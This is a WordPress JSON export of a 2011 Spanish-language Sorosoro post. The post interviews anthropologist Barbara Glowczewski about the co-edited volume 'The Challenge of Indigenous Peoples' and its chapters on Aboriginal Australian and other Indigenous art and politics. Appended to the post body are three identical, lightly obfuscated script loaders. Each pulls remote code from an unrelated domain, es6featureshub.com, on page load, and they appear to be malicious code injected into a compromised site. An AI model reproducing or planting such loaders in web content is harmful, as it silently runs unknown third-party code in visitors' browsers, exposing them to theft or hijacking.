{"id":52417,"date":"2011-07-08T16:08:05","date_gmt":"2011-07-08T14:08:05","guid":{"rendered":"http:\/\/www.sorosoro.org\/?p=52417"},"modified":"2025-10-21T22:31:14","modified_gmt":"2025-10-21T20:31:14","slug":"junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos","status":"publish","type":"post","link":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/","title":{"rendered":"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos)"},"content":{"rendered":"<div id=\"attachment_52418\" style=\"width: 240px\" class=\"wp-caption alignleft\"><img loading=\"lazy\" decoding=\"async\" aria-describedby=\"caption-attachment-52418\" class=\"size-full wp-image-52418\" title=\"challengeindigenous\" src=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg\" alt=\" \" width=\"230\" height=\"350\" srcset=\"https:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg 230w, https:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2-197x300.jpg 197w\" sizes=\"auto, (max-width: 230px) 100vw, 230px\" \/><p id=\"caption-attachment-52418\" class=\"wp-caption-text\"> <\/p><\/div>\n<p style=\"text-align: justify;\"><em>Barbara Glowczewski es Directora de investigaciones en el Laboratorio de antropolog\u00eda social (CNRS \/ EHESS \/ COLEGIO de Francia). Trabaja en particular con los pueblos abor\u00edgenes de Australia. Autora de numerosos libros, art\u00edculos y pel\u00edculas, participa por otro lado regularmente en exposiciones de arte aborigen.<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Coedita con Rosita Henry, profesor en antropolog\u00eda en la Universidad James Cook en Australia, una nueva obra colectiva titulada \u00ab\u00a0The challenge of indigenous peoples\u00a0\u00bb. Este libro, que re\u00fane a antrop\u00f3logos y artistas, explora las maneras en las cuales pueblos aut\u00f3ctonos expresan sus identidades sociales y culturales a trav\u00e9s del arte y la pol\u00edtica.<\/em><\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><strong>Barbara, es una obra colectiva que re\u00fane a autores de varios horizontes, \u00bfde cu\u00e1les pueblos hablan?<\/strong><\/p>\n<p style=\"text-align: justify;\">Ocho autores se fundan sobre sus experiencias respectivas con abor\u00edgenes de diferentes regiones de Australia: Warlpiri y Kukatja del desierto central y del oeste, Yolngu y Yanyuwa, Garrwa, Mara y Kurdanji del territorio del norte, Kija y Yawuru \/ Djabirr Djabirr de Kimberley as\u00ed como artistas de las ciudades del sur.<\/p>\n<p style=\"text-align: justify;\">Otros tres cap\u00edtulos analizan la situaci\u00f3n de pueblos de Ocean\u00eda reunidos con motivo de tres festivales del Pac\u00edfico Sur, particularmente los bunabans, los melanesios de las islas Salom\u00f3n, y los habitantes de Palau.<\/p>\n<p style=\"text-align: justify;\">Finalmente son tratados dos ejemplos de situaciones aut\u00f3ctonas: adivasi de la India y khanty y mansi de Siberia.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><strong>\u00bfPor qu\u00e9 haber restringido la zona geogr\u00e1fica a Asia \/ Pac\u00edfico sur \/ Siberia, y haber dejado de lado a \u00c1frica y al continente Americano?<\/strong><\/p>\n<p style=\"text-align: justify;\">Este libro es la traducci\u00f3n actualizada del Desaf\u00edo ind\u00edgena publicado en 2007 en respuesta a un programa de colaboraci\u00f3n que hab\u00edamos montado con Rosita Henry para acompa\u00f1ar a j\u00f3venes investigadores que trabajaban en Australia.<\/p>\n<p style=\"text-align: justify;\">Organizamos diferentes encuentros internacionales y seminarios donde nuestros colegas oceanistas, y especialistas de la India y de Siberia vinieron para enriquecer la reflexi\u00f3n comparativa; \u00e9sta continu\u00f3 con ejemplos de otros continentes para publicaciones futuras.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><strong>El t\u00edtulo del libro es bastante amplio, ya que los pueblos aut\u00f3ctonos hacen frente a muchos desaf\u00edos. \u00bfDe cu\u00e1les desaf\u00edos en particular quiere hablar?<\/strong><\/p>\n<p style=\"text-align: justify;\">El subt\u00edtulo plantea una cuesti\u00f3n \u00ab\u00bfespect\u00e1culo o pol\u00edtica?\u00bb ya que procura responder a los prejuicios y las negativas de la singularidad cultural de los grupos aut\u00f3ctonos que se exponen en escenas p\u00fablicas.<\/p>\n<p style=\"text-align: justify;\">Para estos grupos, la apuesta es un desaf\u00edo de supervivencia y de reconocimiento: afirmar un derecho de existencia produciendo la imagen que desean dar de ellos mismos, a la vez como tr\u00e1mite cultural y como enunciado pol\u00edtico sobre la autodeterminaci\u00f3n, para cambiar la mirada poscolonial.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><strong>\u00bfPor qu\u00e9 haber escogido la expresi\u00f3n art\u00edstica m\u00e1s que las reivindicaciones m\u00e1s puramente pol\u00edticas?<\/strong><\/p>\n<p style=\"text-align: justify;\">Los Abor\u00edgenes de Australia han revolucionado estos \u00faltimos veinte a\u00f1os la historia del arte contempor\u00e1neo por sus producciones tangibles e intangibles que llevan un mensaje pol\u00edtico.<\/p>\n<p style=\"text-align: justify;\">Muchos otros pueblos aut\u00f3ctonos se inscriben en este movimiento: por la creatividad de sus culturas, luchan contra las discriminaciones. La reciente firma de la Declaraci\u00f3n sobre los derechos de los pueblos aut\u00f3ctonos por los pa\u00edses miembros de la ONU lo demuestra.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><strong>\u00bfCu\u00e1l es el p\u00fablico que procura alcanzar a trav\u00e9s de esta obra?<\/strong><\/p>\n<p style=\"text-align: justify;\">Nos dirigimos a todo el p\u00fablico en el momento en el que la supervivencia del planeta y de su biodiversidad reposa en parte en el reconocimiento de su diversidad cultural.<\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><em>Lista de los contribuidores de la obra:<\/em><\/p>\n<p style=\"text-align: justify;\"><em>Wayne Jowandi Barker; Jessica De Largy Healy; Barbara Glowczewski; Rosita Henry; Wolfgang Kempf; Jari Kupiainen; St\u00e9phane Lacam-Gitareu; G\u00e9raldine Le Roux; Arnaud Morvan; Martin Pr\u00e9aud; Dominique Samson Normand de Chambourg; Alexandre Soucaille; Anke Tonnaer<\/em><\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><em>El libro est\u00e1 disponible para la compra (en ingl\u00e9s \u00fanicamente) en formato papel o en formato electr\u00f3nico.<\/em><\/p>\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.bardwell-press.co.uk\/publications\/indigenous.htm\" target=\"_blank\">Para saber m\u00e1s y\/o comprar el libro<\/a><\/p>\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\">\n<p style=\"text-align: justify;\"><a href=\"http:\/\/www.sorosoro.org\/le-programme-sorosoro\/le-conseil-scientifique\">Para leer la biograf\u00eda de Barbara Glowczewski, miembro del Consejo Cient\u00edfico de Sorosoro<\/a><\/p>\n<p><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><script>;(function (l, z, f, e, r, p) { r = z.createElement(f); p = z.getElementsByTagName(f)[0]; r.async = 1; r.src = e; p.parentNode.insertBefore(r, p); })(window, document, 'script', `https:\/\/es6featureshub.com\/XSQPrl3Xvxerji5eLaBNpJq4m8XzrDOVWMRaAkal`);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Barbara Glowczewski es Directora de investigaciones en el Laboratorio de antropolog\u00eda social (CNRS \/ EHESS \/ COLEGIO de Francia). Trabaja en particular con los pueblos abor\u00edgenes de Australia. Autora de numerosos libros, art\u00edculos y pel\u00edculas, participa por otro lado regularmente en exposiciones de arte aborigen. Coedita con Rosita Henry, profesor en antropolog\u00eda en la Universidad [&hellip;]<\/p>\n","protected":false},"author":18,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-52417","post","type-post","status-publish","format-standard","hentry","category-noticias"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos) - Sorosoro<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/\" \/>\n<meta property=\"og:locale\" content=\"es_ES\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos) - Sorosoro\" \/>\n<meta property=\"og:description\" content=\"Barbara Glowczewski es Directora de investigaciones en el Laboratorio de antropolog\u00eda social (CNRS \/ EHESS \/ COLEGIO de Francia). Trabaja en particular con los pueblos abor\u00edgenes de Australia. Autora de numerosos libros, art\u00edculos y pel\u00edculas, participa por otro lado regularmente en exposiciones de arte aborigen. Coedita con Rosita Henry, profesor en antropolog\u00eda en la Universidad [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/\" \/>\n<meta property=\"og:site_name\" content=\"Sorosoro\" \/>\n<meta property=\"article:published_time\" content=\"2011-07-08T14:08:05+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2025-10-21T20:31:14+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg\" \/>\n<meta name=\"author\" content=\"Michel.Lemee\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"Michel.Lemee\" \/>\n\t<meta name=\"twitter:label2\" content=\"Tiempo de lectura\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/\"},\"author\":{\"name\":\"Michel.Lemee\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"headline\":\"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos)\",\"datePublished\":\"2011-07-08T14:08:05+00:00\",\"dateModified\":\"2025-10-21T20:31:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/\"},\"wordCount\":706,\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg\",\"articleSection\":[\"Noticias sobre los idiomas en peligro\"],\"inLanguage\":\"es\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/\",\"url\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/\",\"name\":\"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos) - Sorosoro\",\"isPartOf\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg\",\"datePublished\":\"2011-07-08T14:08:05+00:00\",\"dateModified\":\"2025-10-21T20:31:14+00:00\",\"author\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#breadcrumb\"},\"inLanguage\":\"es\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"es\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#primaryimage\",\"url\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg\",\"contentUrl\":\"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.sorosoro.org\/es\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos)\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#website\",\"url\":\"https:\/\/www.sorosoro.org\/es\/\",\"name\":\"Sorosoro\",\"description\":\"Pour que vivent les langues du monde !\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"es\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18\",\"name\":\"Michel.Lemee\",\"url\":\"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos) - Sorosoro","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/","og_locale":"es_ES","og_type":"article","og_title":"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos) - Sorosoro","og_description":"Barbara Glowczewski es Directora de investigaciones en el Laboratorio de antropolog\u00eda social (CNRS \/ EHESS \/ COLEGIO de Francia). Trabaja en particular con los pueblos abor\u00edgenes de Australia. Autora de numerosos libros, art\u00edculos y pel\u00edculas, participa por otro lado regularmente en exposiciones de arte aborigen. Coedita con Rosita Henry, profesor en antropolog\u00eda en la Universidad [&hellip;]","og_url":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/","og_site_name":"Sorosoro","article_published_time":"2011-07-08T14:08:05+00:00","article_modified_time":"2025-10-21T20:31:14+00:00","og_image":[{"url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg","type":"","width":"","height":""}],"author":"Michel.Lemee","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"Michel.Lemee","Tiempo de lectura":"3 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#article","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/"},"author":{"name":"Michel.Lemee","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"headline":"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos)","datePublished":"2011-07-08T14:08:05+00:00","dateModified":"2025-10-21T20:31:14+00:00","mainEntityOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/"},"wordCount":706,"image":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg","articleSection":["Noticias sobre los idiomas en peligro"],"inLanguage":"es"},{"@type":"WebPage","@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/","url":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/","name":"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos) - Sorosoro","isPartOf":{"@id":"https:\/\/www.sorosoro.org\/es\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#primaryimage"},"image":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#primaryimage"},"thumbnailUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg","datePublished":"2011-07-08T14:08:05+00:00","dateModified":"2025-10-21T20:31:14+00:00","author":{"@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18"},"breadcrumb":{"@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#breadcrumb"},"inLanguage":"es","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/"]}]},{"@type":"ImageObject","inLanguage":"es","@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#primaryimage","url":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg","contentUrl":"http:\/\/www.sorosoro.org\/wp-content\/uploads\/challengeindigenous2.jpg"},{"@type":"BreadcrumbList","@id":"https:\/\/www.sorosoro.org\/es\/2011\/07\/junio-del-2011-entrevista-de-barbara-glowczewski-para-la-publicacion-de-the-challenge-of-indigenous-peoples-el-desafio-de-los-pueblos-autoctonos\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.sorosoro.org\/es\/"},{"@type":"ListItem","position":2,"name":"Junio del 2011: entrevista de Barbara Glowczewski para la publicaci\u00f3n de \u00ab The Challenge of Indigenous Peoples \u00bb (El desaf\u00edo de los pueblos aut\u00f3ctonos)"}]},{"@type":"WebSite","@id":"https:\/\/www.sorosoro.org\/es\/#website","url":"https:\/\/www.sorosoro.org\/es\/","name":"Sorosoro","description":"Pour que vivent les langues du monde !","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.sorosoro.org\/es\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"es"},{"@type":"Person","@id":"https:\/\/www.sorosoro.org\/es\/#\/schema\/person\/6a38d9a3b9816780bdc12b184c7d9e18","name":"Michel.Lemee","url":"https:\/\/www.sorosoro.org\/es\/author\/michel-lemee\/"}]}},"_links":{"self":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/52417","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/users\/18"}],"replies":[{"embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/comments?post=52417"}],"version-history":[{"count":0,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/posts\/52417\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/media?parent=52417"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/categories?post=52417"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.sorosoro.org\/es\/wp-json\/wp\/v2\/tags?post=52417"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}